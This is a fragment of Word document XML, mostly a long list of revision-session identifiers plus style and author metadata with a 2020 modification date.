    <w:rsid w:val="4F7D43E0"/>
    <w:rsid w:val="501D4DE2"/>
    <w:rsid w:val="505421BD"/>
    <w:rsid w:val="5064143C"/>
    <w:rsid w:val="518F4695"/>
    <w:rsid w:val="51D63B59"/>
    <w:rsid w:val="52201848"/>
    <w:rsid w:val="525E1358"/>
    <w:rsid w:val="52E037AE"/>
    <w:rsid w:val="54206C63"/>
    <w:rsid w:val="548D35A8"/>
    <w:rsid w:val="54D22B9A"/>
    <w:rsid w:val="54EA185D"/>
    <w:rsid w:val="57C8162A"/>
    <w:rsid w:val="58AD1582"/>
    <w:rsid w:val="5927407C"/>
    <w:rsid w:val="59571690"/>
    <w:rsid w:val="5A027883"/>
    <w:rsid w:val="5B4A450C"/>
    <w:rsid w:val="5B684AC0"/>
    <w:rsid w:val="5C2A3992"/>
    <w:rsid w:val="5D0A3B52"/>
    <w:rsid w:val="5D6066F0"/>
    <w:rsid w:val="5FAD4EB9"/>
    <w:rsid w:val="60241CB6"/>
    <w:rsid w:val="607233C5"/>
    <w:rsid w:val="61656FC9"/>
    <w:rsid w:val="61962989"/>
    <w:rsid w:val="61D97EAF"/>
    <w:rsid w:val="6239314B"/>
    <w:rsid w:val="627724B4"/>
    <w:rsid w:val="63192E00"/>
    <w:rsid w:val="63350845"/>
    <w:rsid w:val="6394516E"/>
    <w:rsid w:val="64253A65"/>
    <w:rsid w:val="647E2841"/>
    <w:rsid w:val="6555489D"/>
    <w:rsid w:val="65C205C6"/>
    <w:rsid w:val="65FD56D5"/>
    <w:rsid w:val="661A0757"/>
    <w:rsid w:val="666B221E"/>
    <w:rsid w:val="66CB7674"/>
    <w:rsid w:val="66E90F20"/>
    <w:rsid w:val="66EE652A"/>
    <w:rsid w:val="6773391C"/>
    <w:rsid w:val="67FD143A"/>
    <w:rsid w:val="68BE79F0"/>
    <w:rsid w:val="6C0F1ACC"/>
    <w:rsid w:val="6CF5358A"/>
    <w:rsid w:val="6D0C21C8"/>
    <w:rsid w:val="6D393632"/>
    <w:rsid w:val="6E4A0E57"/>
    <w:rsid w:val="6EAE37A8"/>
    <w:rsid w:val="6FF83EF9"/>
    <w:rsid w:val="70072423"/>
    <w:rsid w:val="70496C75"/>
    <w:rsid w:val="71C5519E"/>
    <w:rsid w:val="722F2E47"/>
    <w:rsid w:val="73911804"/>
    <w:rsid w:val="73BF7ECC"/>
    <w:rsid w:val="744271C5"/>
    <w:rsid w:val="747F4827"/>
    <w:rsid w:val="74C81B33"/>
    <w:rsid w:val="774D285C"/>
    <w:rsid w:val="783547B9"/>
    <w:rsid w:val="788205D1"/>
    <w:rsid w:val="78B8103E"/>
    <w:rsid w:val="79934514"/>
    <w:rsid w:val="79D45B31"/>
    <w:rsid w:val="7A0F6284"/>
    <w:rsid w:val="7A35298E"/>
    <w:rsid w:val="7A392667"/>
    <w:rsid w:val="7A6053C5"/>
    <w:rsid w:val="7A902819"/>
    <w:rsid w:val="7A9747BB"/>
    <w:rsid w:val="7BD07546"/>
    <w:rsid w:val="7DCB65E2"/>
    <w:rsid w:val="7DCE46E4"/>
    <w:rsid w:val="7E0F319F"/>
    <w:rsid w:val="7EB61E99"/>
    <w:rsid w:val="7F2E5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yperlink"/>
    <w:basedOn w:val="6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violet&amp;partain</dc:creator>
  <cp:lastModifiedBy>violet&amp;partain</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-18T08:37:01Z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